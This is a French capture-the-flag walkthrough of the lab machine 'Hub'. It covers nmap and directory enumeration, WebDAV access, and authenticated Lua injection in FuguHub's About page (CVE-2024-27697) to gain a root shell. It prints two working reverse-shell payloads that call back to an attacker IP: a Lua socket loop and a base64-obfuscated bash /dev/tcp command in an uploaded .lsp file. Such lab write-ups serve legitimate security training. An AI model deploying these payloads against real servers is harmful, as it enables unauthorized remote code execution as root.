# Hub

`lua` `Barracuda` `WebDav`

* Nom machine : Hub
* Difficulté : Facile
* OS : Linux

## Enumération

### NMAP

```
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-18 12:49 EDT
Nmap scan report for 192.168.233.25
Host is up (0.035s latency).
Not shown: 65531 closed tcp ports (conn-refused)
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 c9:c3:da:15:28:3b:f1:f8:9a:36:df:4d:36:6b:a7:44 (RSA)
|   256 26:03:2b:f6:da:90:1d:1b:ec:8d:8f:8d:1e:7e:3d:6b (ECDSA)
|_  256 fb:43:b2:b0:19:2f:d3:f6:bc:aa:60:67:ab:c1:af:37 (ED25519)
80/tcp   open  http     nginx 1.18.0
|_http-server-header: nginx/1.18.0
|_http-title: 403 Forbidden
8082/tcp open  http     Barracuda Embedded Web Server
|_http-server-header: BarracudaServer.com (Posix)
| http-webdav-scan: 
|   Server Type: BarracudaServer.com (Posix)
|   Server Date: Sun, 18 Aug 2024 16:50:07 GMT
|   Allowed Methods: OPTIONS, GET, HEAD, PROPFIND, PATCH, POST, PUT, COPY, DELETE, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK
|_  WebDAV type: Unknown
| http-methods: 
|_  Potentially risky methods: PROPFIND PATCH PUT COPY DELETE MOVE MKCOL PROPPATCH LOCK UNLOCK
|_http-title: Home
9999/tcp open  ssl/http Barracuda Embedded Web Server
| http-methods: 
|_  Potentially risky methods: PROPFIND PATCH PUT COPY DELETE MOVE MKCOL PROPPATCH LOCK UNLOCK
| ssl-cert: Subject: commonName=FuguHub/stateOrProvinceName=California/countryName=US
| Subject Alternative Name: DNS:FuguHub, DNS:FuguHub.local, DNS:localhost
| Not valid before: 2019-07-16T19:15:09
|_Not valid after:  2074-04-18T19:15:09
|_http-server-header: BarracudaServer.com (Posix)
| http-webdav-scan: 
|   Server Type: BarracudaServer.com (Posix)
|   Server Date: Sun, 18 Aug 2024 16:50:07 GMT
|   Allowed Methods: OPTIONS, GET, HEAD, PROPFIND, PATCH, POST, PUT, COPY, DELETE, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK
|_  WebDAV type: Unknown
|_http-title: Home
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

### HTTP (80)

```
┌──(kali㉿kali)-[~]
└─$ dirsearch -u http://192.168.233.25/
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET
Threads: 25 | Wordlist size: 11460

Output File: /home/kali/reports/http_192.168.233.25/__24-08-18_12-50-54.txt

Target: http://192.168.233.25/

[12:50:54] Starting: 
[12:51:08] 301 -  169B  - /applications  ->  http://192.168.233.25/applications/
[12:51:11] 301 -  169B  - /data  ->  http://192.168.233.25/data/
[12:51:16] 200 -   87B  - /LICENSE.txt
[12:51:22] 200 -   18KB - /readme.txt
[12:51:26] 301 -  169B  - /themes  ->  http://192.168.233.25/themes/

Task Completed
```

### HTTP (9999) : Barracuda Embedded Web Server

Nous allonstout d'abord nous créer un compte puis nous connecter.

```
┌──(kali㉿kali)-[~/oscp]
└─$ cadaver https://192.168.233.25:9999/fs/
WARNING: Untrusted server certificate presented for `FuguHub':
Certificate was issued to hostname `FuguHub' rather than `192.168.233.25'
This connection could have been intercepted.
Issued to: California, US
Issued by: SharkSSL, Real Time Logic LLC, US
Certificate is valid from Tue, 16 Jul 2019 19:15:09 GMT to Wed, 18 Apr 2074 19:15:09 GMT
Do you wish to accept the certificate? (y/n) y
Authentication required for Web File Server on server `192.168.233.25':
Username: admin
Password: 
dav:/fs/> ls
Listing collection `/fs/': succeeded.
Coll:   .LOCK                                  0  Jun 13  2023
Coll:   images                                 0  Jul 16  2019
Coll:   introduction-to-photo-albums           0  Apr 30  2014
        autumn.txt                           153  Nov  3  2021
        favicon.ico                          600  Nov  3  2021
        flower.txt                            95  Nov  3  2021
        passion.txt                           76  Nov  3  2021
        red.txt                               42  Nov  3  2021
        rounded.txt                          188  Nov  3  2021
        sky.txt                              112  Nov  3  2021
        zenlike.txt                           91  Nov  3  2021
dav:/fs/> 
```

<figure><img src="https://2731053407-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F1RXsXNh9elYzxZgW8W8f%2Fuploads%2FWeIgR5HqsGoscuT8CO8a%2F397d9f33c7e556efcf8f66b99ba81144.png?alt=media&#x26;token=6dff19a3-ad6b-4db1-9c02-6009b4834694" alt=""><figcaption></figcaption></figure>

Nous allons dans Administrator Panel puis Customize About Page. L'about page est en lua.

<figure><img src="https://2731053407-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F1RXsXNh9elYzxZgW8W8f%2Fuploads%2FqV52Xgms5InjYLYJA3AE%2F1206dda0adc2d076958f5a5ab994ff19.png?alt=media&#x26;token=57ddfcfd-cb04-4f6e-97da-033f1bda6873" alt=""><figcaption></figcaption></figure>

## Accès initial

Il y a un champ où on peut personnaliser la page, nous allons donc essayer de l'exploiter en injectant du code lua.

{% embed url="<https://github.com/SanjinDedic/FuguHub-8.4-Authenticated-RCE-CVE-2024-27697>" %}

```
<style>
#info {background: #2F94FA;border-radius: 10px;margin:10px;padding:10px}
#info p {margin-left:10px;font-size:120%}
#info p,#info a,#info a:hover{color:white;}
</style>

<?lsp if request:method() == "GET" then ?>
    <?lsp 
        local host, port = "192.168.45.176", 8082
        local socket = require("socket")
        local tcp = socket.tcp()
        local io = require("io")
        local connection, err = tcp:connect(host, port)
        
        if not connection then
            print("Error connecting: " .. err)
            return
        end
        
        while true do
            local cmd, status, partial = tcp:receive()
            if status == "closed" or status == "timeout" then break end
            if cmd then
                local f = io.popen(cmd, "r")
                local s = f:read("*a")
                f:close()
                tcp:send(s)
            end
        end
        
        tcp:close()
    ?>
<?lsp else ?>
    Wrong request method, goodBye! 
<?lsp end ?>

<h2>FuguHub <?lsp=bd.version?></h2>
<img style="margin:30px" src="/rtl/images/logo.gif" alt="logo" align="left" />

<div style="margin-left:auto;margin-right: auto;width: 350px;"> 

<div id="info">
<h2>License</h2>
<p>FuguHub is free to use for non-commercial or educational use. FuguHub cannot be used for commercial use.</p>
</div>

<p>FuguHub is powered by: 
<ul>
<li><a href="https://realtimelogic.com/products/barracuda-application-server/" target="_blank">Barracuda Embedded Web Server</a></li>
<li><a href="https://realtimelogic.com/products/sharkssl/" target="_blank">SharkSSL Embedded SSL Stack</a></li>
<li><a href="https://realtimelogic.com/products/lua-server-pages/" target="_blank">Lua Server Pages</a></li>
</ul>
</p>

</div>
```

```
┌──(kali㉿kali)-[~]
└─$ nc -lnvp 8082
listening on [any] 8082 ...
connect to [192.168.45.176] from (UNKNOWN) [192.168.233.25] 37168
whoami
root
```

Nous sommes root !

### Deuxième méthode

Toujours car on sait que la page exécute du lua.

Nous allons créer ce fichier sur notre machine

```
┌──(kali㉿kali)-[~]
└─$ cat shell.lsp
<?lsp if request:method() == "GET" then ?>
   <?lsp os.execute("echo c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC40NS4xNzYvMTIzNCAwPiYxCg== | base64 -d | bash") ?>
<?lsp else ?>
   You sent a <?lsp=request:method()?> request
<?lsp end ?>
```

Nous allons l'uploader sur le serveur, que cela soit avec cadaver ou bien le site.

Nous retrouvons notre fichier à : `https://192.168.233.25:9999/shell.lsp` Si nous suivons le chemin /fs, nous allons télécharger le fichier et non l'exécuter.